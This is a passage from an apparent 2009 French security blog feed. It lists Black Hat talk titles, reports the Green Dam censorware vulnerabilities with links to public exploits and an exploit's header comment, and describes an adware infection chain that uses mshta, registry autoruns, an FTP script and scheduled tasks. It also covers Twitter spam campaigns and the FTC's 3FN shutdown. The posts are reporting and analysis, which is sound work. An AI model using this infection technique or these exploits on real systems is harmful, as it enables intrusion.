<li>I Just Found 10 Million SSN's (Alessandro Acquisti)</li> 
<li>Fighting Russian Cybercrime Mobsters: Report from the Trenches (Dmitri Alperovitch)</li> 
<li>Sniff Keystrokes With Lasers/Voltmeters</li> 
<li>Side Channel Attacks Using Optical Sampling of Mechanical Energy and Power Line Leakage (Andrea Barisani, Daniele Bianco)</li> 
<li>Beckstrom's Law: A Model for Valuing Networks and Security (Rod Beckstrom)</li> 
<li>MD5 Chosen-Prefix Collisions on GPUs (Marc Bevand)</li> 
<li>Anti-Forensics: The Rootkit Connection (Bill Blunden)</li> 
<li>Embedded Management Interfaces: Emerging Massive Insecurity (Hristo Bojinov, Dan Boneh, Elie Bursztein)</li> 
<li>BitTorrent Hacks (Michael Brooks, David Aslanian)</li> 
<li>Exploratory Android Surgery (Jesse Burns)</li> 
<li>Reversing and Exploiting an Apple Firmware Update (K. Chen)</li> 
<li>SADE: Injecting Agents into VM Guest OS (Matt Conover)</li> 
<li>Advanced Mac OS X Rootkits (Dino Dai Zovi)</li> 
<li>Lockpicking Forensics (Datagram)</li> 
<li>Recoverable Advanced Metering Infrastructure (Mike Davis)</li> 
<li>Psychotronica: Exposure, Control, and Deceit (Nitesh Dhanjani)</li> 
<li>The Language of Trust: Exploiting Trust Relationships in Active Content (Mark Dowd, Ryan Smith, David Dewey)</li> 
<li>Advanced MySQL Exploitation (Muhaimin Dzulfakar)</li> 
<li>Demystifying Fuzzers (Michael Eddington)</li> 
<li>Gizmo: A Lightweight Open Source Web Proxy (Rachel Engel)</li> 
<li>State of the Art Post Exploitation in Hardened PHP Environments (Stefan Esser)</li> 
<li>Hacking the Smart Grid (Tony Flick)</li> 
<li>Internet Special Ops: Stalking Badness Through Data Mining (Andrew Fried, Paul Vixie, Dr. Chris Lee)</li> 
<li>Breaking the &quot;Unbreakable&quot; Oracle with Metasploit (Chris Gates)</li> 
<li>A 16 bit Rootkit and Second Generation Zigbee Chips (Travis Goodspeed)</li> 
<li>&quot;Smart&quot; Parking Meter Implementations, Globalism, and You (Joe Grand, Jacob Appelbaum, Chris Tarnovsky )</li> 
<li>Computer Crime Year In Review: MySpace, MBTA, Boston College and More (Jennifer Granick)</li> 
<li>Mo' Money Mo' Problems: Making A LOT More Money on the Web the Black Hat Way (Jeremiah Grossman, Trey Ford)</li> 
<li>How Economics and Information Security Affects Cyber Crime and What It Means in the Context of a Global Recession (Peter Guerra</li> 
<li>Weaponizing the Web: More Attacks on User-Generated Content (Nathan Hamiel, Shawn Moyer)</li> 
<li>Win at Reversing: Tracing and Sandboxing through Inline Hooking (Nick Harbour)</li> 
<li>Exploiting Rich Content (Riley Hassell)</li> 
<li>Economics and the Underground Economy (Cormac Herley, Dinei Florencio)</li> 
<li>Cloudifornication: Indiscriminate Information Intercourse Involving Internet Infrastructure (Chris Hoff, Enno Rey)</li> 
<li>Veiled: A Browser-based Darknet (Billy Hoffman, Matt Wood)</li> 
<li>The Conficker Mystery (Mikko Hypponen)</li> 
<li>Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone (Vincenzo Iozzo, Charlie Miller)</li> 
<li>Jackpotting Automated Teller Machines (Barnaby Jack)</li> 
<li>Something about Network Security (Dan Kaminsky)</li> 
<li>Stoned Bootkit (Peter Kleissner)</li> 
<li>Cloudburst: Hacking 3D (and Breaking Out of VMware) (Kostya Kortchinsky)</li> 
<li>Attacking SMS (Zane Lackey, Luis Miras)</li> 
<li>Rapid Enterprise Triaging (RETRI): How to Run a Compromised Network and Keep Your Data Safe (Aaron LeMasters, Michael Murphy)</li> 
<li>Router Exploitation (Felix &quot;FX&quot; Lindner )</li> 
<li>Is Your Phone Pwned? Auditing, Attacking and Defending Mobile Devices (Kevin Mahaffey, Anthony Lineberry, John Hering)</li> 
<li>More Tricks For Defeating SSL (Moxie Marlinspike)</li> 
<li>Practical Windows XP/2003 Heap Exploitation (John McDonald, Chris Valasek)</li> 
<li>Clobbering the Cloud! (Haroon Meer, Nick Arvanitis, Marco Slaviero)</li> 
<li>Managed Code Rootkits: Hooking into the Runtime Environments (Erez Metula)</li> 
<li>Fuzzing the Phone in your Phone (Charlie Miller, Collin Mulliner)</li> 
<li>Netscreen of the Dead: Developing a Trojaned ScreenOS for Juniper Netscreen Appliances (Graeme Neilson</li> 
<li>Long-life Sessions: This is Why We Can't Have Nice Things (Steve Ocepek)</li> 
<li>Fight Against 1-day Exploits: Diffing Binaries vs Anti-diffing Binaries (Jeongwook Oh)</li> 
<li>Deactivate the Rootkit (Alfredo Ortega, Anibal Sacco)</li> 
<li>Hacking Capitalism '09: Vulnerabilities In Markets And Trading Platforms (Thomas H. Ptacek, David Goldsmith, Jeremy Rauch)</li> 
<li>Reverse Engineering By Crayon: Game Changing Hypervisor Based Malware Analysis and Visualization (Danny Quist, Lorie Liebrock)</li> 
<li>Your Mind: Legal Status, Rights and Securing Yourself (Tiffany Strauchs Rad, James Arlen)</li> 
<li>Automated Malware Similarity Analysis (Daniel Raygoza)</li> 
<li>Re-conceptualizing Security (Bruce Schneier)</li> 
<li>Breaking the security myths of Extended Validation SSL Certificates (Alexander Sotirov, Mike Zusman)</li> 
<li>Worst of the Best of the Best (Kevin Stadmeyer, Garrett Held)</li> 
<li>Defensive Rewriting: A New Take on XSS/XSRF/Redirect-Phishing Defense (Bryan Sullivan)</li> 
<li>Introducing Ring -3 Rootkits (Alexander Tereshkin, Rafal Wojtczuk)</li> 
<li>Global Spying: Realistic Probabilities in Modern Signals Intelligence (Steve Topletz, Jonathan Logan, Kyle Williams)</li> 
<li>Ruby for Pentesters (Michael Tracy, Chris Rohlf, Eric Monti)</li> 
<li>Our Favorite XSS Filters and How to Attack Them (Eduardo Vela Nava, David Lindsay)</li> 
<li>Fast &amp; Furious Reverse Engineering with TitanEngine (Mario Vuksan, Tomislav Pericin)</li> 
<li>Unraveling Unicode: A Bag of Tricks for Bug Hunting (Chris Weber)</li> 
<li>There's a Fox in the Henhouse: Java Enterprise Rootkits (Jeff Williams)</li> 
<li>Attacking Intel® BIOS (Rafal Wojtczuk, Alexander Tereshkin)</li> 
</ol> 
<p><img src="http://mad.internetpol.fr/imgupz/bhw.jpg" alt="Black Hat Webcasts" /></p> 
<p><a title="BlackHat" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=671&amp;entry_id=51"  onmouseover="window.status='https://www.blackhat.com';return true;" onmouseout="window.status='';return true;">https://www.blackhat.com</a> <br /></p> 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://mad.internetpol.fr/archives/50-Le-logiciel-de-filtrage-pornographique-du-gouvernement-chinois-est-vulnerable.html" rel="alternate" title="Le logiciel de filtrage pornographique du gouvernement chinois est vulnérable" />
        <author>
            <name>Matt</name>
                    </author>
    
        <published>2009-06-12T06:03:00Z</published>
        <updated>2009-07-03T08:44:59Z</updated>
        <wfw:comment>http://mad.internetpol.fr/wfwcomment.php?cid=50</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://mad.internetpol.fr/rss.php?version=atom1.0&amp;type=comments&amp;cid=50</wfw:commentRss>
    
    
        <id>http://mad.internetpol.fr/archives/50-guid.html</id>
        <title type="html">Le logiciel de filtrage pornographique du gouvernement chinois est vulnérable</title>
        <content type="xhtml" xml:base="http://mad.internetpol.fr/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                <p>La France avec ses ~65 millions d'habitants compte ~33 millions d'internautes. Dernièrement, la loi aux multiples noms <a title="HADOPI, LCI, OLIVENNES..." target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=663&amp;entry_id=50"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Loi_Hadopi';return true;" onmouseout="window.status='';return true;">HADOPI, LCI, OLIVENNES...</a> a été sérieusement perturbée par la décision (<a title="Conseil Constitutionnel n° 2009-580" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=664&amp;entry_id=50"  onmouseover="window.status='http://www.conseil-constitutionnel.fr/conseil-constitutionnel/francais/les-decisions/2009/decisions-par-date/2009/2009-580-dc/decision-n-2009-580-dc-du-10-juin-2009.42666.html';return true;" onmouseout="window.status='';return true;">n° 2009-580</a>)&#160; du Conseil Constitutionnel ; les sages s'alignent sur l'avis du Parlement Européen à savoir qu'Internet est une composante de la liberté d'expression, considérée comme un droit fondamental auquel seul un juge peut porter atteinte. <u>Rappel</u>: HADOPI prévoit de vendre aux internautes soucieux de leur sécurité un programme espion certifié qui va permettre de filtrer et contrôler les données entrantes et sortantes des communications électroniques.</p> 
<p> <img src="http://mad.internetpol.fr/imgupz/Logo_GDYE.gif" />Maintenant, passons à la Chine, ~1 milliard 350 millions d'habitants dont 250 millions d'internautes, c'est un des pays qui contrôle le plus strictement l'espace Internet au monde. Il y a quelques jours, le ministère chinois de l'Industrie et de la Technologie de l'information a annoncé que tous les fabricants d'ordinateurs seront tenus d'installer préalablement un logiciel de filtrage qui vise à filtrer et bloquer des contenus malsains, dont la pornographie (<em>interdite</em>) et la violence. &quot;<strong><a title="Green Dam-Youth Escort" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=667&amp;entry_id=50"  onmouseover="window.status='http://en.wikipedia.org/wiki/Green_Dam_Youth_Escort';return true;" onmouseout="window.status='';return true;">Green Dam</a></strong>&quot;, c'est son nom, devra être implanté sur toutes les machines vendues dans le pays à compter du 1er juillet 2009, y compris les machines importées et les fabricants devront fournir des comptes au gouvernement.</p> <br /> 
<p><em>Summary: We have discovered remotely-exploitable vulnerabilities in Green Dam, the censorship software reportedly mandated by the Chinese government. Any web site a Green Dam user visits can take control of the PC. According to press reports, China will soon require all PCs sold in the country to include Green Dam. This software monitors web sites visited and other activity on the computer and blocks adult content as well as politically sensitive material. We examined the Green Dam software and found that it contains serious security vulnerabilities due to programming errors. Once Green Dam is installed, any web site the user visits can exploit these problems to take control of the computer. This could allow malicious sites to steal private data, send spam, or enlist the computer in a botnet. In addition, we found vulnerabilities in the way Green Dam processes blacklist updates that could allow the software makers or others to install malicious code during the update process. We found these problems with less than 12 hours of testing, and we believe they may be only the tip of the iceberg. Green Dam makes frequent use of unsafe and outdated programming practices that likely introduce numerous other vulnerabilities. Correcting these problems will require extensive changes to the software and careful retesting. In the meantime, we recommend that users protect themselves by uninstalling Green Dam immediately.</em></p> 
<p> </p> 
<p> </p> 
<p> </p> 
<p> </p> 
<p><img src="http://mad.internetpol.fr/imgupz/Splash_GDYE.jpg" /></p> 
<p> </p> 
<p>&#160;Après à peine 12 heures de tests, l'étude <a title="Analysis of the Green Dam Censorware System" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=666&amp;entry_id=50"  onmouseover="window.status='http://www.cse.umich.edu/%7Ejhalderm/pub/gd/';return true;" onmouseout="window.status='';return true;">Analysis of the Green Dam Censorware System</a> de Scott Wolchok, Randy Yao, &amp; J. Alex Halderman est édifiante. Pour être honnête, j'ai d'abord pensé à une mauvaise blague mais après téléchargement et petites vérifications de la preuve de faisabilité, il s'avère que c'est la triste vérité, les composants n'ont pas été audités et s'exposent à de sérieuses vulnérabilités qui peuvent entraîner une compromission complète de la machine. Imaginez un réseau de millions de zombies ? Surprenant, le contenu du fichier 'adwfil.dat' stipule que le site français de
l'ISIMA (Institut Supérieur d'Informatique de Modélisation et de leurs
Applications) n'est pas fréquentable pour... les internautes chinois ! Ci-dessous, une liste des fichiers ayant été décryptés:<br /></p> 
<p> </p> 
<p>&#160;&#160;&#160; * adwapp.dat - http://privatepaste.com/aey5BIlkyx<br />&#160;&#160;&#160; * adwfil.dat - http://privatepaste.com/091MdBUyDv<br />&#160;&#160;&#160; * auctfil.dat - http://privatepaste.com/f20vFALQPl<br />&#160;&#160;&#160; * bnrfil.dat - http://privatepaste.com/76uATdcCsN<br />&#160;&#160;&#160; * bsnlst.dat - http://privatepaste.com/b6tJvZlQJN<br />&#160;&#160;&#160; * chtfil.dat - http://privatepaste.com/32hbY5XUgy<br />&#160;&#160;&#160; * csnews.dat - http://privatepaste.com/bb1RyuqiVu<br />&#160;&#160;&#160; * cultfil.dat - http://privatepaste.com/dc1NtZn183<br />&#160;&#160;&#160; * entfil.dat - http://privatepaste.com/bd0qklsJuD<br />&#160;&#160;&#160; * finfil.dat - http://privatepaste.com/b414bkBNPv<br />&#160;&#160;&#160; * fmfil.dat - http://privatepaste.com/3d114bf1mD<br />&#160;&#160;&#160; * fshrfil.dat - http://privatepaste.com/b8kPPu9ZiV<br />&#160;&#160;&#160; * gblfil.dat - http://privatepaste.com/53CXciru9I<br />&#160;&#160;&#160; * gdwfil.dat - http://privatepaste.com/49ftIfdRqJ<br />&#160;&#160;&#160; * gnfil.dat - http://privatepaste.com/c6lU71HHUT<br />&#160;&#160;&#160; * hatfil.dat - http://privatepaste.com/1005oQLOJv<br />&#160;&#160;&#160; * iawfil.dat - http://privatepaste.com/951A0xSKW2<br />&#160;&#160;&#160; * imgfil.dat - http://privatepaste.com/cehwHinyM0<br />&#160;&#160;&#160; * jbfil.dat - http://privatepaste.com/7d1cmQ7bdW<br />&#160;&#160;&#160; * lgwfil.dat - http://privatepaste.com/a1ndIrVvEn<br />&#160;&#160;&#160; * movfil.dat - http://privatepaste.com/99cMT8Xjyr<br />&#160;&#160;&#160; * mp3fil.dat - http://privatepaste.com/f0uBTti5uh<br />&#160;&#160;&#160; * nvgamfil.dat - http://privatepaste.com/9aYQOBgQoU<br />&#160;&#160;&#160; * perfil.dat - http://privatepaste.com/7driTj667b<br />&#160;&#160;&#160; * picsfil.dat - http://privatepaste.com/34TI4cSbZE<br />&#160;&#160;&#160; * pkmon.dat - http://privatepaste.com/580KvOFYV4<br />&#160;&#160;&#160; * popfil.dat - http://privatepaste.com/c10gAsIEuq<br />&#160;&#160;&#160; * psyfil.dat - http://privatepaste.com/ae0GA79ZFm<br />&#160;&#160;&#160; * sporfil.dat - http://privatepaste.com/e20QeOlezv<br />&#160;&#160;&#160; * swfil.dat - http://privatepaste.com/aeSIsoDlKd<br />&#160;&#160;&#160; * tafil.dat - http://privatepaste.com/26FTx1Dfjz<br />&#160;&#160;&#160; * tapfil.dat - http://privatepaste.com/ae0UoosGMk<br />&#160;&#160;&#160; * TrustUrl.dat - http://privatepaste.com/4c0Q3tzzb0<br />&#160;&#160;&#160; * vgamfil.dat - http://privatepaste.com/1auoil5bP2<br />&#160;&#160;&#160; * viofil.dat - http://privatepaste.com/f79OiqXC6J<br />&#160;&#160;&#160; * wfile.dat - http://privatepaste.com/450zZe32hn<br />&#160;&#160;&#160; * wfileu.dat - http://privatepaste.com/9c0oaeS0i1<br />&#160;&#160;&#160; * wrestfil.dat - http://privatepaste.com/eapAh32NC8<br />&#160;&#160;&#160; * wzfil.dat - http://privatepaste.com/170Epo2wTZ</p> 
<p>Merci à l'illustre inconnu, '<em>minagi</em>' pour ses recherches.</p> 
<p> 
Quelques heures après la publication de l'étude:&#160; Exploit ITW<br /><span style="color: #146913;">&lt;!-- Green Dam Remote Buffer Overflow(shellcode for WinXP sp2) --&gt;
</span><br style="color: #146913;" /><span style="color: #146913;">&lt;!-- by Seer[N.N.U] 101702333@qq.com / raven87033@hotmail.com&#160; --&gt;</span> </p> 
<p> 
Liens connexes:<br />
- <a href="http://mad.internetpol.fr/exit.php?url_id=669&amp;entry_id=50"  onmouseover="window.status='http://blogs.zdnet.com/security/?p=3606';return true;" onmouseout="window.status='';return true;" target="_blank" title="China confirms security flaws in Green Dam, rushes to release a patch">China confirms security flaws in Green Dam, rushes to release a patch</a> ( June 15, 2009, Dancho Danchev )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=678&amp;entry_id=50"  onmouseover="window.status='http://www.rec-sec.com/2009/06/16/green-dam-url-overflow-exploit/';return true;" onmouseout="window.status='';return true;" target="_blank" title="Green Dam URL Processing Buffer Overflow exploit (meta)">Green Dam URL Processing Buffer Overflow exploit (meta)</a> ( June 16 2009, Recognize-Security ) <br /> - <a href="http://mad.internetpol.fr/exit.php?url_id=680&amp;entry_id=50"  onmouseover="window.status='http://sunbeltblog.blogspot.com/2009/06/chinese-government-delays-green-dam.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="Chinese government delays Green Dam requirement (maybe forever)">Chinese government delays Green Dam requirement (maybe forever)</a> ( June 30 2009, Tom Kelchner )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=681&amp;entry_id=50"  onmouseover="window.status='http://www.milw0rm.com/exploits/9065';return true;" onmouseout="window.status='';return true;" target="_blank" title="Green Dam Remote Change System Time Exploit">Green Dam Remote Change System Time Exploit</a> ( July 1 2009, milw0rm )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=685&amp;entry_id=50"  onmouseover="window.status='http://www.f-secure.com/weblog/archives/00001713.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="China's Dam Delay">China's Dam Delay</a> ( July 2 2009, Sean Sullivan )</p>
<p> </p> 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://mad.internetpol.fr/archives/49-Twitter-Trends-Attack-What-are-WE-doing.html" rel="alternate" title="Twitter Trends Attack - What are WE doing?" />
        <author>
            <name>Joe</name>
                    </author>
    
        <published>2009-06-11T16:46:00Z</published>
        <updated>2009-06-12T20:44:20Z</updated>
        <wfw:comment>http://mad.internetpol.fr/wfwcomment.php?cid=49</wfw:comment>
    
        <slash:comments>1</slash:comments>
        <wfw:commentRss>http://mad.internetpol.fr/rss.php?version=atom1.0&amp;type=comments&amp;cid=49</wfw:commentRss>
    
    
        <id>http://mad.internetpol.fr/archives/49-guid.html</id>
        <title type="html">Twitter Trends Attack - What are WE doing?</title>
        <content type="xhtml" xml:base="http://mad.internetpol.fr/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                <p>
Depuis plusieurs semaines, les utilisateurs de <a title="Wikipedia: Twitter" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=652&amp;entry_id=49"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Twitter';return true;" onmouseout="window.status='';return true;">Twitter</a> sont inondés par des milliers de <em>tweets</em>, les cyber-criminels utilisent les &quot;<em>trending topics</em>&quot;, des mots clefs en relation avec l'actualité et les tendances de nos sociétés, pour forger le contenu de ces messages puis y insèrent dynamiquement un lien malveillant. Les risques de se faire piéger sont élevés car l'utilisateur n'est pas en mesure de dissocier les éléments malveillants dans la masse de tweets légitimes et l'utilisation d'un enchaînement de redirections par des services de type &quot;Short URLs&quot; (URLs raccourcis) ne facilitent pas la tâche. Les dernières redirections étudiées mènent à l'installation de faux logiciels de sécurité comme Adware/PrivacyCenter ou encore Adware/FastScan. Bien sûr, les comptes ayant été préalablement identifiés comme étant des acteurs dans ces campagnes sont supprimés par l'équipe sécurité de Twitter mais pendant ce temps d'autres comptes sont générés et activés. Comme le souligne <em>Sean-Paul Correll</em> dans son article '<a title="Visualizing the Twitter Trends Attack" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=653&amp;entry_id=49"  onmouseover="window.status='http://pandalabs.pandasecurity.com/archive/Visualizing-the-Twitter-Trends-Attack.aspx';return true;" onmouseout="window.status='';return true;">Visualizing the Twitter Trends Attack</a>' : <u>ces campagnes à faibles coûts et simples à déployer vont s'amplifier</u>. Il est donc important de prendre conscience de l'émergence de ces méthodes afin de prendre des mesures rapides, adaptées et efficaces et c'est <u>tous ensemble</u> que <u>nous serons capables d'affronter ces nouvelles problématiques.</u></p> 
<p> </p> <p> </p> 
<p>Plutôt 'cool' le rendu des visualisations des attaques chez PandaLabs: c'est ce que je me suis dit en lisant l'article. J'ai alors réalisé que mon bon vieux script perl, bien qu'il ait été utilisé jusqu'à aujourd'hui, fait vraiment démodé face à ça. Mettre en place sa propre modélisation &quot;<em>Social Networking Attacks</em>&quot; actualisée en temps réel et directement affichée par transparence dans l'un de mes bureaux, mais voilà une idée qu'elle est bonne ! Je ne vais pas vous expliquer comment j'ai développé mon projet mais je tiens à vous informer qu'il est très simple et rapide de créer le vôtre grâce aux <a href="http://mad.internetpol.fr/exit.php?url_id=668&amp;entry_id=49"  onmouseover="window.status='http://apiwiki.twitter.com';return true;" onmouseout="window.status='';return true;" target="_blank" title="API Wiki - Twitter.com">API fournies par Twitter.</a> Installez <a title="Python" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=655&amp;entry_id=49"  onmouseover="window.status='http://www.python.org/';return true;" onmouseout="window.status='';return true;">Python</a> si vous ne l'avez pas et faites de même pour le fantastique outil <a title="UbiGraph" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=656&amp;entry_id=49"  onmouseover="window.status='http://ubietylab.net/ubigraph/content/Downloads/index.php';return true;" onmouseout="window.status='';return true;">UbiGraph</a> proposé par Ubiety Lab, Inc. Utilisez ensuite <a title="python setuptools" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=657&amp;entry_id=49"  onmouseover="window.status='http://pypi.python.org/pypi/setuptools';return true;" onmouseout="window.status='';return true;">easy_install</a> pour installer facilement <a title="Python-Twitter" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=658&amp;entry_id=49"  onmouseover="window.status='http://code.google.com/p/python-twitter/';return true;" onmouseout="window.status='';return true;">Python-Twitter</a> . Enfin, téléchargez <a title="Christian S. Perone - twitter3d.py" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=659&amp;entry_id=49"  onmouseover="window.status='http://pyevolve.sourceforge.net/wordpress/wp-content/uploads/2009/02/twitter3d.py';return true;" onmouseout="window.status='';return true;">twitter3d.py</a> de Christian S. Perone aka <a title="Twitter: tarantulae" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=660&amp;entry_id=49"  onmouseover="window.status='http://twitter.com/tarantulae';return true;" onmouseout="window.status='';return true;">tarantulae</a> ( auteur de <a href="http://mad.internetpol.fr/exit.php?url_id=662&amp;entry_id=49"  onmouseover="window.status='http://pyevolve.sourceforge.net/';return true;" onmouseout="window.status='';return true;" target="_blank" title="pyevolve">pyevolve</a> ) puis exécutez le script avec l'option -u en spécifiant le pseudo que vous souhaitez visualiser&#160; ; vous pouvez maintenant modéliser toutes ses relations simplement en effectuant un double clic sur le pseudo. Voici ce que vous aurez à l'écran: </p> 
<p><img alt="MalwareScene" src="http://mad.internetpol.fr/imgupz/ms.gif" /></p> 
<p>Cool ? Si vous voulez, il est possible de faire la même chose avec d'autres réseaux sociaux, par exemple avec <a title="PyFacebook" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=661&amp;entry_id=49"  onmouseover="window.status='http://code.google.com/p/pyfacebook/';return true;" onmouseout="window.status='';return true;">PyFacebook</a> ;)<br /></p> 
<p><br /></p> 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://mad.internetpol.fr/archives/47-AdWare.Win32.CashOn.html" rel="alternate" title="AdWare.Win32.CashOn" />
        <author>
            <name>S!Ri</name>
                    </author>
    
        <published>2009-06-05T10:22:10Z</published>
        <updated>2009-06-11T15:00:55Z</updated>
        <wfw:comment>http://mad.internetpol.fr/wfwcomment.php?cid=47</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://mad.internetpol.fr/rss.php?version=atom1.0&amp;type=comments&amp;cid=47</wfw:commentRss>
    
    
        <id>http://mad.internetpol.fr/archives/47-guid.html</id>
        <title type="html">AdWare.Win32.CashOn</title>
        <content type="xhtml" xml:base="http://mad.internetpol.fr/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                <p>Si on se place du point de vue de l'analyste, les programmes malveillants utilisent des astuces parfois assez amusantes. L'utilisateur infecté qui ne fait que constater les effets indésirables ne perçoit certainement pas les choses de la même façon. <br /></p> <p><strong>Setup.exe</strong> est un trojan qui se fait passer pour ce qu'il n'est pas, une installation de faux codecs, et les ruses pour inciter l'utilisateur à exécuter le programme sont nombreuses. Ce binaire à la propriété d'être très léger, il va d'abord télécharger un fichier PHP via <strong>mshta.exe</strong> (Microsoft HTML Application Host). Si un pare-feu se met à &quot;hurler&quot;, les probabilités que l'application soit autorisée par l'utilisateur sont élevées car celui-ci imagine qu'il s'agit d'un composant légitime de son système d'exploitation.</p>
<p>Le fichier PHP va délivrer un code Javascript qui va ensuite exécuter localement un script VBA.</p> 
<p> <img src="http://mad.internetpol.fr/imgupz/JavascriptObfusque.png" /> </p> 
<p> Celui-ci va d'abord inscrire dans le registre plusieurs exécutions automatiques d'un nouvel exécutable (AdWare.Win32.CashOn) puis va écrire à la volée un script FTP pour télécharger l'AdWare et enfin va programmer le planificateur de tâches afin que toutes les 10mn des traitements soient réalisés.<br /></p> 
<p>L'infection est bien au chaud.<br /> </p> 
<p><img src="http://mad.internetpol.fr/imgupz/VBA.ftp.schedule.png" /></p>  
<p>Le programme est téléchargé et exécuté plusieurs fois ; à chacune des instances, il se connecte sur une nouvelle page PHP afin d'obtenir des adresses. Une fois obtenues, il va visiter les pages web de façon dissimulée et automatique générant ainsi du trafic et rémunérant les affiliés. Parfois, une vidéo s'exécutera au fil de la navigation... Je vous laisse imaginer la surprise de l'utilisateur infecté qui se retrouve nez à nez avec des vidéos pornos. Mais le plus grave et c'est un sérieux problème, c'est que le cache de votre navigateur va se remplir d'images et de contenus divers et variés (<span style="font-style: italic;">hétéros, homos, mineurs...</span>). Enfin, si une des pages visitées contient des exploits et que le système n'est pas mis à jour, la machine se retrouve avec d'autres malwares (<span style="font-style: italic;">rogues ou botnets)</span>.<br /><br /></p> 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://mad.internetpol.fr/archives/48-Bonne-nouvelle-L-infame-3FN-enfin-epingle-par-FTC.html" rel="alternate" title="Bonne nouvelle - L' infâme 3FN enfin épinglé par FTC" />
        <author>
            <name>Matt</name>
                    </author>
    
        <published>2009-06-05T06:00:00Z</published>
        <updated>2009-06-09T02:18:50Z</updated>
        <wfw:comment>http://mad.internetpol.fr/wfwcomment.php?cid=48</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://mad.internetpol.fr/rss.php?version=atom1.0&amp;type=comments&amp;cid=48</wfw:commentRss>
    
    
        <id>http://mad.internetpol.fr/archives/48-guid.html</id>
        <title type="html">Bonne nouvelle - L' infâme 3FN enfin épinglé par FTC</title>
        <content type="xhtml" xml:base="http://mad.internetpol.fr/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                <img alt="FTC" src="http://mad.internetpol.fr/imgupz/ftc.gif" /> <p><div class="bb-code-title">FTC</div><div class="bb-quote">A rogue Internet Service Provider that recruits,
knowingly hosts, and actively participates in the distribution of spam,
child pornography, and other harmful electronic content has been shut
down by a district court judge at the request of the Federal Trade
Commission. The ISP’s upstream providers and data centers have
disconnected its servers from the Internet.<br /> <br />
According to the FTC, the defendant, Pricewert LLC, which does business
under a variety of names including 3FN and APS Telecom, actively
recruits and colludes with criminals seeking to distribute illegal,
malicious, and harmful electronic content including child pornography,
spyware, viruses, trojan horses, phishing, botnet command and control
servers, and pornography featuring violence, bestiality, and incest.
The FTC alleges that the defendant advertised its services in the
darkest corners of the Internet, including a forum established to
facilitate communication between criminals.<br /> <br />
The complaint alleges that Pricewert actively shielded its criminal
clientele by either ignoring take-down requests issued by the online
security community, or shifting its criminal elements to other Internet
protocol addresses it controlled to evade detection. </div> </p> 
<p>Lire
l'article en entier : <a href="http://mad.internetpol.fr/exit.php?url_id=643&amp;entry_id=48" title="http://www.ftc.gov/opa/2009/06/3fn.shtm"  onmouseover="window.status='http://www.ftc.gov/opa/2009/06/3fn.shtm';return true;" onmouseout="window.status='';return true;">http://www.ftc.gov/opa/2009/06/3fn.shtm</a> <br /> </p> 
<p><img alt="Infamous 3FN" src="http://mad.internetpol.fr/imgupz/3fn.gif" /></p> 
<p>Good job, <span style="text-decoration: underline;">^^</span></p>
Liens connexes:<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=651&amp;entry_id=48"  onmouseover="window.status='http://voices.washingtonpost.com/securityfix/2009/06/ftc_sues_shuts_down_n_calif_we.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="FTC Sues, Shuts Down N. Calif. Web Hoasting Firm">FTC Sues, Shuts Down N. Calif. Web Hoasting Firm</a> ( June 4, 2009, Brian Krebs) <br />
- <a title="Arbor Networks Security - Things in 3FN" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=649&amp;entry_id=48"  onmouseover="window.status='http://asert.arbornetworks.com/2009/06/things-in-3fn/';return true;" onmouseout="window.status='';return true;">Arbor Networks Security - Things in 3FN</a> ( June 5, 2009, Jose Nazario )<br /><br /> 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://mad.internetpol.fr/archives/46-googleanalytlcs.net,-beladen.net-Impressions-de-deja-vu.html" rel="alternate" title="googleanalytlcs.net, beladen.net - Impressions de « déjà vu »" />
        <author>
            <name>Joe</name>
                    </author>
    
        <published>2009-05-22T16:10:00Z</published>
        <updated>2009-06-24T13:07:53Z</updated>
        <wfw:comment>http://mad.internetpol.fr/wfwcomment.php?cid=46</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://mad.internetpol.fr/rss.php?version=atom1.0&amp;type=comments&amp;cid=46</wfw:commentRss>
    
    
        <id>http://mad.internetpol.fr/archives/46-guid.html</id>
        <title type="html">googleanalytlcs.net, beladen.net - Impressions de « déjà vu »</title>
        <content type="xhtml" xml:base="http://mad.internetpol.fr/">
            <div xmlns="http://www.w3.org/1999/xhtml">
